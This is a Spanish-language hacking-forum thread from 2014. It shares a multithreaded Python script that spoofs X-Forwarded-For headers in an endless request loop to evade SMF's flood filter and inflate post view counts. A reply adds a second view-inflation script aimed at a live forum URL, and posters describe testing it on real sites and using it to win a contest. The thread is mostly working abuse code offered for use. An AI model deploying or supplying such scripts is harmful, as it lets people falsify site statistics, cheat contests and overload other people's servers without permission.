comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SMF Incorrect Flood Filter Headers

  • 11 Respuestas
  • 8081 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 21, 2014, 10:49:25 pm »








Código: Python
  1. #!/usr/bin/python
  2. # RemoteExecution
  3. #Autor: Daniel Godoy A.K.A hielasangre
  4.  
  5. import sys, threading, time, urllib2,re
  6. print "Ingrese URL: "
  7. url = raw_input()
  8. a = b = c = d = 1
  9. count = 0
  10. class SMFPwner(threading.Thread):
  11.   def __init__(self, num):
  12.       threading.Thread.__init__(self)
  13.       self.num = num      
  14.   def run(self):
  15.     while 1:
  16.         global a,b,c,d,count, url
  17.         data = ""
  18.         while 1:
  19.             while 1:
  20.                 if d!=250:
  21.                     d+=1
  22.                 else:
  23.                     if c!= 250:
  24.                         c+=2
  25.                         d=0
  26.                     else:
  27.                         if b!=250:
  28.                             c=0
  29.                             d=0
  30.                             b+=1
  31.                         else:
  32.                             a+=1
  33.                             b=0
  34.                             c=0
  35.                             d=0
  36.                 head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
  37.                 headers = { 'X-Forwarded-For' : head }
  38.                 req = urllib2.Request(url, data, headers)
  39.                 f = urllib2.urlopen(req)
  40.                 count += 1
  41.                 print "[ Visitando => " + url + " Por " + str(count) +" vez ]"
  42. for i in range(3):      
  43.         ta = SMFPwner(i)
  44.         ta.start()
  45.  

Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

Fuente: You are not allowed to view links. Register or Login
« Última modificación: Agosto 21, 2014, 11:00:21 pm por Expermicid »

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5331
  • Actividad:
    58.33%
  • Reputación 30
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Agosto 21, 2014, 10:56:42 pm »
Muy bueno hielasangre!!
Te hago una pregunta, esto genera sobrecarga en el servidor?

Abrazo!


Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Agosto 21, 2014, 11:17:49 pm »
You are not allowed to view links. Register or Login
Muy bueno hielasangre!!
Te hago una pregunta, esto genera sobrecarga en el servidor?

Abrazo!
Todo depende de como este configurado, pero si porque son múltiples conexiones! Igual, si tenes un cloudflare en el medio lo mitiga automáticamente :)
« Última modificación: Agosto 21, 2014, 11:38:07 pm por hielasangre »

Desconectado chivo

  • *
  • Underc0der
  • Mensajes: 26
  • Actividad:
    0%
  • Reputación 0
  • 127.0.0.1
    • Ver Perfil
    • Email
  • Skype: chivoxxx
« Respuesta #3 en: Agosto 21, 2014, 11:39:37 pm »
Gracias puedo usar el codigo para hacer una aplicacion claro coloco tu credito. Y te paso por MP el source final.
Sacando la Basura.p

Haitumichu you! or wachiton wachiton to!!

Casa Fantasma

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Agosto 21, 2014, 11:42:30 pm »
You are not allowed to view links. Register or Login
Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

No lo tomo como insulto, pero ahí lo respondí. Yo mismo se que es inútil, es verdad quizás el post debería ser borrado.. A lo mejor perdí mi tiempo no lo se, pero a lo mejor a otro le guste... En fin es cuestión de gustos! Lo use para un PoC

Como dije, todo va en cada uno.. You are not allowed to view links. Register or Login


You are not allowed to view links. Register or Login
Gracias puedo usar el codigo para hacer una aplicacion claro coloco tu credito. Y te paso por MP el source final.


Dale que va, no interesan los creditos! Lo que interesa es que te sea útil!

Desconectado $francisco

  • *
  • Underc0der
  • Mensajes: 191
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: hackloper
« Respuesta #5 en: Agosto 22, 2014, 08:05:10 pm »
Creo que cualquier código es de agradecer, una cosa que no entendí, ¿que es la cabecera X-Forwarded-For?

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Agosto 22, 2014, 08:26:23 pm »
You are not allowed to view links. Register or Login
Creo que cualquier código es de agradecer, una cosa que no entendí, ¿que es la cabecera X-Forwarded-For?

You are not allowed to view links. Register or Login

Desconectado elrodrix

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Agosto 23, 2014, 09:02:00 am »
Grande dani. Gracias por compartir. Y como decia un gran amigo mio, "a la gilada ni cabida, yo la miro desde arriba".

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #8 en: Agosto 23, 2014, 09:15:52 am »
Ya lo probe :3 xD jajajaj interesante el script mil maneras de trollear :D

PD: Lo piratee para mi blog! ;)

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Once

  • *
  • Underc0der
  • Mensajes: 385
  • Actividad:
    5%
  • Reputación 0
    • Ver Perfil
    • El blog de Once
  • Twitter: @don_once
« Respuesta #9 en: Agosto 23, 2014, 01:46:04 pm »
Genial brother, esto lo usé hace algún tiempo para ganar un concurso en otro foro. Aunque no es necesario complicarse con el X-Forwarded-For, este es el code que usé (lo probé acá en Underc0de y aún funciona) por si le sirve a alguien más para algo.

Código: Python
  1. import time
  2. import urllib2
  3.  
  4.  
  5. class Pvisits(object):
  6.     def __init__(self, url, nvisitas, delay=0):
  7.         headers = {
  8.             "Referer": url,
  9.             "User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
  10.         }
  11.    
  12.         for x in xrange(nvisitas):
  13.             time.sleep(delay)
  14.             request = urllib2.Request(url, headers=headers)
  15.             obj_web = urllib2.urlopen(request)
  16.             codigo = obj_web.code
  17.             if codigo == 200:
  18.                 print obj_web.geturl(), codigo, nvisitas - x
  19.             elif codigo >= 400:
  20.                 print "Ocurrio un error:", codigo
  21.                 return
  22.  
  23.  
  24. Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)
  25.  

Saludos!






You are not allowed to view links. Register or Login

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Agosto 23, 2014, 02:33:47 pm »
You are not allowed to view links. Register or Login
Genial brother, esto lo usé hace algún tiempo para ganar un concurso en otro foro. Aunque no es necesario complicarse con el X-Forwarded-For, este es el code que usé (lo probé acá en Underc0de y aún funciona) por si le sirve a alguien más para algo.

Código: Python
  1. import time
  2. import urllib2
  3.  
  4.  
  5. class Pvisits(object):
  6.     def __init__(self, url, nvisitas, delay=0):
  7.         headers = {
  8.             "Referer": url,
  9.             "User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
  10.         }
  11.    
  12.         for x in xrange(nvisitas):
  13.             time.sleep(delay)
  14.             request = urllib2.Request(url, headers=headers)
  15.             obj_web = urllib2.urlopen(request)
  16.             codigo = obj_web.code
  17.             if codigo == 200:
  18.                 print obj_web.geturl(), codigo, nvisitas - x
  19.             elif codigo >= 400:
  20.                 print "Ocurrio un error:", codigo
  21.                 return
  22.  
  23.  
  24. Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)
  25.  

Saludos!

OPAAAAA :D Muy bueno! Hay que estudiar mas SMF me parece entonces :P

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1893
  • Actividad:
    16.67%
  • Reputación 14
    • Ver Perfil
« Respuesta #11 en: Agosto 23, 2014, 08:53:21 pm »
Muy buen aporte, como dice hielasangre, me parece que vamos a tener que estudiar mas smf jajaja



 

¿Te gustó el post? COMPARTILO!